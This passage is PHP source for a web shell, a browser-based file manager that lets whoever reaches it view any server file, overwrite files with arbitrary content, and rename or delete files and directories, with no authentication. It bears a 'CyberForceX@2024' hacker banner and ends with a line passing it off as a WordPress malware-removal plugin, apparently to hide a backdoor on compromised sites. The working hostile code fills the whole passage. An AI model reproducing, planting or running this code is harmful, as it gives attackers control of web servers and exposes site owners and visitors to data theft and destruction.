echo " <textarea style=\"width: 100%;height: 400px;\" readonly> " . htmlspecialchars(file_get_contents($_GET["filesrc"])) . "</textarea>";
} elseif (isset($_GET["option"]) && $_GET["opt"] != "delete") {
echo "</table><br /><center>" . $_POST["maarg"] . "<br /><br />";
if ($_GET["opt"] == "chmod") {
if (isset($_POST["perm"])) {
}
$hell = $_GET["maarg"];
$kiya = $_GET["name"];
$patc = "{$hell}/{$kiya}";
} elseif ($_GET["opt"] == "rename") {
if (isset($_POST["newname"])) {
if (rename($_POST["maarg"], $maarg . "/" . $_POST["newname"])) {
echo "<font color=\"green\">Name Changed!</font><br />";
} else {
echo "<font color=\"red\">Error Found!</font><br />";
}
$_POST["name"] = $_POST["newname"];
}
$hell = $_GET["maarg"];
$kiya = $_GET["name"];
$patc = "{$hell}/{$kiya}";
$new = $_POST["newname"];
echo "<form method=\"POST\">\nNew Name : <input name=\"newname\" type=\"text\" size=\"20\" value=\"" . $new . "\" />\n<input type=\"hidden\" name=\"maarg\" value=\"" . $patc . "\">\n<input type=\"hidden\" name=\"opt\" value=\"rename\">\n<input type=\"submit\" value=\"Save\" />\n</form>";
} elseif ($_GET["opt"] == "edit") {
if (isset($_POST["src"])) {
$fp = fopen($_POST["maarg"], "w");
if (fwrite($fp, $_POST["src"])) {
echo "<font color=\"green\">File Edited!</font><br />";
} else {
echo "<font color=\"red\">Edit Error! </font><br />";
}
fclose($fp);
}
$hell = $_GET["maarg"];
$kiya = $_GET["name"];
$patc = "{$hell}/{$kiya}";
echo "<form method=\"POST\">\n<textarea cols=80 rows=20 name=\"src\">" . htmlspecialchars(file_get_contents($patc)) . "</textarea><br />\n<input type=\"hidden\" name=\"maarg\" value=\"" . $patc . "\">\n<input type=\"hidden\" name=\"opt\" value=\"edit\">\n<input type=\"submit\" value=\"Save\" />\n</form>";
}
echo "</center>";
} else {
echo "</table><br /><center>";
if (isset($_GET["option"]) && $_GET["opt"] == "delete") {
$hell = $_GET["maarg"];
$kiya = $_GET["name"];
$patc = "{$hell}/{$kiya}";
if ($_GET["type"] == "dir") {
if (rmdir($patc)) {
echo "<font color=\"green\">Dir Delted!</font><br />";
} else {
echo "<font color=\"red#\">Delete Error! </font><br />";
}
} elseif ($_GET["type"] == "file") {
$hell = $_GET["maarg"];
$kiya = $_GET["name"];
$patc = "{$hell}/{$kiya}";
if (unlink($patc)) {
echo "<font color=\"red#\">File Deleted! </font><br />";
} else {
echo "<font color=\"red#\">Delete File Error </font><br />";
}
}
}
echo "</center>";
$scandir = scandir($maarg);
$pa = getcwd();
echo " <table width=\"95%\" class=\"table_home\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\" style=\"color:cyan;\">\n<tr>\n<th class=th_home style=\"background:green;color: White; text-shadow: 0px 3px 12px red;\"><center><b>Name</b></center></th>\n<th class=th_home style=\"background:green;color: White; text-shadow: 0px 3px 12px red;\" ><center><b>Size</b></center></th>\n<th class=th_home style=\"background:green;color: White; text-shadow: 0px 3px 12px red;\" ><center><b>Permision</b></center></th>\n<th class=th_home style=\"background:green;color: White; text-shadow: 0px 3px 12px red;\" ><center><b>Options</b></center></th>\n</tr> <tr>\n";
foreach ($scandir as $dir) {
if (!is_dir("{$maarg}/{$dir}") || $dir == "." || $dir == "..") {
continue;
}
echo "\n<tr>\n<td class=td_home><a href=\"?maarg={$maarg}/{$dir}\">{$dir}</a></td>\n<td class=td_home ><center>Dir</center></td>\n<td class=td_home ><center>";
if (is_writable("{$maarg}/{$dir}")) {
echo "<font color=\"green\">";
} elseif (!is_readable("{$maarg}/{$dir}")) {
echo "<font color=\"red\">";
}
echo perms("{$maarg}/{$dir}");
if (is_writable("{$maarg}/{$dir}") || !is_readable("{$maarg}/{$dir}")) {
echo "</font>";
}
echo "</center></td>\n<td class=td_home ><center><a href=\"?option&maarg={$maarg}&opt=rename&type=dir&name={$dir}\"> Rename</a> <a href=\"?option&maarg={$maarg}&opt=delete&type=dir&name={$dir}\"> Delete</a>\n</center></td>\n</tr>";
}
echo "<br>";
foreach ($scandir as $ICF) {
if (!is_file("{$maarg}/{$ICF}")) {
continue;
}
$size = filesize("{$maarg}/{$ICF}") / 1024;
$size = round($size, 3);
if ($size >= 1024) {
$size = round($size / 1024, 2) . " MB";
} else {
$size .= " KB";
}
echo "<tr>\n<td class=td_home ><a href=\"?filesrc={$maarg}/{$ICF}&maarg={$maarg}\">{$ICF}</a></td>\n<td class=td_home><center>" . $size . "</center></td>\n<td class=td_home><center>";
if (is_writable("{$maarg}/{$ICF}")) {
echo "<font color=\"green\">";
} elseif (!is_readable("{$maarg}/{$ICF}")) {
echo "<font color=\"red\">";
}
echo perms("{$maarg}/{$ICF}");
if (is_writable("{$maarg}/{$ICF}") || !is_readable("{$maarg}/{$ICF}")) {
echo "</font>";
}
echo "</center></td>\n<td class=td_home><center>\n<a href=\"?option&maarg={$maarg}&opt=edit&type=file&name={$ICF}\">Edit</a> <a href=\"?option&maarg={$maarg}&opt=rename&type=file&name={$ICF}&maarg={$maarg}\"> Rename</a> <a href=\"?option&maarg={$maarg}&opt=delete&type=file&name={$ICF}\"> Delete</a>\n</center></td>\n</tr>";
}
echo "</table>\n</div>";
}
echo "<center><h5><font color=\"\" Face=\"Indie\"style=\"color: White; text-shadow: 1px 4px 12px red;\">CyberForceX@2024</font></h5></body>\n</html>";
function perms($ICF)
{
$anumati = fileperms($ICF);
if (($anumati & 49152) == 49152) {
$tathya = "s";
} elseif (($anumati & 40960) == 40960) {
$tathya = "l";
} elseif (($anumati & 32768) == 32768) {
$tathya = "-";
} elseif (($anumati & 24576) == 24576) {
$tathya = "b";
} elseif (($anumati & 16384) == 16384) {
$tathya = "d";
} elseif (($anumati & 8192) == 8192) {
$tathya = "c";
} elseif (($anumati & 4096) == 4096) {
$tathya = "p";
} else {
$tathya = "u";
}
$tathya .= $anumati & 256 ? "r" : "-";
$tathya .= $anumati & 128 ? "w" : "-";
$tathya .= $anumati & 64 ? $anumati & 2048 ? "s" : "x" : ($anumati & 2048 ? "S" : "-");
$tathya .= $anumati & 32 ? "r" : "-";
$tathya .= $anumati & 16 ? "w" : "-";
$tathya .= $anumati & 8 ? $anumati & 1024 ? "s" : "x" : ($anumati & 1024 ? "S" : "-");
$tathya .= $anumati & 4 ? "r" : "-";
$tathya .= $anumati & 2 ? "w" : "-";
$tathya .= $anumati & 1 ? $anumati & 512 ? "t" : "x" : ($anumati & 512 ? "T" : "-");
return $tathya;
}Malware detection & removal plugin for WordPress
(C)2020 Wordpress Doctor All rights reserved.